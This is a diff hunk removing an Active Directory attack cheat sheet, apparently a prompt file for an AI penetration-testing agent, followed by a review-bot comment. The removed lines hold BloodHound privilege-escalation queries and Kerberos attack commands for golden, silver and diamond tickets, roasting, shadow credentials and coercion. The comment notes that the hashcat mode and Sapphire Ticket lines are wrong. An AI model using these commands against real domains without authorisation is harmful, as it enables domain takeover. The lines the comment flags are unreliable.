Kerberoastable DA paths: MATCH (u:User {hasspn:true})-[r:MemberOf*1..]->(g:Group {name:"DOMAIN ADMINS@DOMAIN"}) RETURN u
|
|
204
|
-
Users with DCSync rights: MATCH p=(u)-[:DCSync|AllExtendedRights|GenericAll]->(d:Domain) RETURN p
|
|
205
|
-
Unconstrained delegation computers: MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
|
|
206
|
-
Computers where domain users are admin: MATCH p=(g:Group)-[:AdminTo]->(c:Computer) RETURN p
|
|
207
|
-
ACL paths (WriteDACL/GenericAll): MATCH p=(u)-[:GenericAll|WriteDACL|WriteOwner|GenericWrite]->(n) RETURN p
|
|
208
|
-
|
|
209
|
-
3. Custom queries for Hard/Insane:
|
|
210
|
-
web_search("bloodhound custom cypher queries privilege escalation 2024")
|
|
211
|
-
web_search("bloodhound edge {edge_type} exploitation")
|
|
212
|
-
```
|
|
213
|
-
|
|
214
|
-
## Kerberos Attack Full Map
|
|
215
|
-
|
|
216
|
-
```
|
|
217
|
-
KERBEROS ATTACK SURFACE:
|
|
218
|
-
│
|
|
219
|
-
├── Ticket Attacks
|
|
220
|
-
│ ├── Golden Ticket: compromise krbtgt → forge TGT for any user/group
|
|
221
|
-
│ │ impacket-ticketer -nthash KRBTGT -domain-sid SID -domain DOMAIN admin
|
|
222
|
-
│ │ Valid for 10 years; survives password changes (not krbtgt rotation)
|
|
223
|
-
│ │
|
|
224
|
-
│ ├── Silver Ticket: compromise service account → forge service ticket
|
|
225
|
-
│ │ impacket-ticketer -nthash SERVICE_HASH -domain-sid SID -spn SERVICE/HOST admin
|
|
226
|
-
│ │ Stealthier (no DC contact); service-specific
|
|
227
|
-
│ │
|
|
228
|
-
│ ├── Diamond Ticket: modify existing legitimate TGT (harder to detect than Golden)
|
|
229
|
-
│ │ Rubeus.exe diamond /krbkey:KRBTGT_AES /ticketuser:admin /groups:512
|
|
230
|
-
│ │ web_search("diamond ticket attack rubeus detection evasion")
|
|
231
|
-
│ │
|
|
232
|
-
│ └── Sapphire Ticket: request real TGT for non-existent user, inject legit PAC
|
|
233
|
-
│ web_search("sapphire ticket attack kerberos 2024")
|
|
234
|
-
│
|
|
235
|
-
├── Roasting
|
|
236
|
-
│ ├── Kerberoasting: SPN accounts → request TGS → crack offline
|
|
237
|
-
│ │ Priority targets: service accounts (svc_*, sql, http, MSSQLSvc)
|
|
238
|
-
│ │ hashcat -m 13100 (RC4) or -m 19600 (AES256) → try common service passwords
|
|
239
|
-
│ │
|
|
240
|
-
│ ├── AS-REP Roasting: no preauth required → roast without creds
|
|
241
|
-
│ │ Enumerate: Get-ADUser -Filter * -Properties DoesNotRequirePreAuth
|
|
242
|
-
│ │
|
|
243
|
-
│ └── Targeted Roasting: if you have GenericWrite → disable preauth temporarily
|
|
244
|
-
│ Set-ADAccountControl user -DoesNotRequirePreAuth $true → roast → restore
|
|
245
|
-
│
|
|
246
|
-
├── Delegation Abuse (Constrained/Unconstrained/RBCD)
|
|
247
|
-
│ ├── Tools: findDelegation.py, PowerView Get-DomainComputer -TrustedToAuth
|
|
248
|
-
│ ├── S4U2Self + S4U2Proxy: impersonate any user to target service
|
|
249
|
-
│ └── RBCD: write msDS-AllowedToActOnBehalfOfOtherIdentity → arbitrary impersonation
|
|
250
|
-
│
|
|
251
|
-
├── pkinit / Certificate-Based Auth
|
|
252
|
-
│ ├── Got ADCS cert? → certipy auth → TGT + NT hash WITHOUT password
|
|
253
|
-
│ └── Shadow Credentials: msDS-KeyCredentialLink → certificate auth for target account
|
|
254
|
-
│ pywhisker -t TARGET -a add --domain DOMAIN --dc-ip DC -u user -p pass
|
|
255
|
-
│
|
|
256
|
-
└── Kerberos Relay / Coercion
|
|
257
|
-
├── krbrelayx: relay Kerberos auth (unconstrained delegation hosts)
|
|
258
|
-
├── PetitPotam / DFSCoerce / PrinterBug / MS-RPRN → coerce DC auth
|
|
259
|
-
├── RemotePotato0 / RemotePotato (local → cross-session relay)
|
|
260
|
-
└── web_search("kerberos relay attack {year} {coercion_method}")
|
|
261
|
-
```
|
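Review bot: this hunk also lacks a file header; by its -261 count it is package/dist/prompts/techniques/ad-attack.md. Two technical errors in the removed text should not be re-imported: under Roasting, "hashcat -m 13100 (RC4) or -m 19600 (AES256)" is wrong, because mode 19600 is Kerberos 5 TGS-REP etype 17 (AES128) and AES256 (etype 18) is mode 19700, so an AES256 Kerberoast hash would not load with the listed mode; and the Sapphire Ticket line ("request real TGT for non-existent user, inject legit PAC") misdescribes the technique, which takes a real low-privileged user's TGT and swaps in the PAC of a real privileged user obtained through S4U2self with U2U, with no non-existent user involved. Smaller points: the silver ticket command "impacket-ticketer -nthash SERVICE_HASH -domain-sid SID -spn SERVICE/HOST admin" omits the required -domain argument that the golden ticket line above it does include, and the password-spray entry says "check lockout policy first!" without saying how, so a concrete step (query the domain password policy before the first spray) would turn that from advice into an instruction the agent can act on.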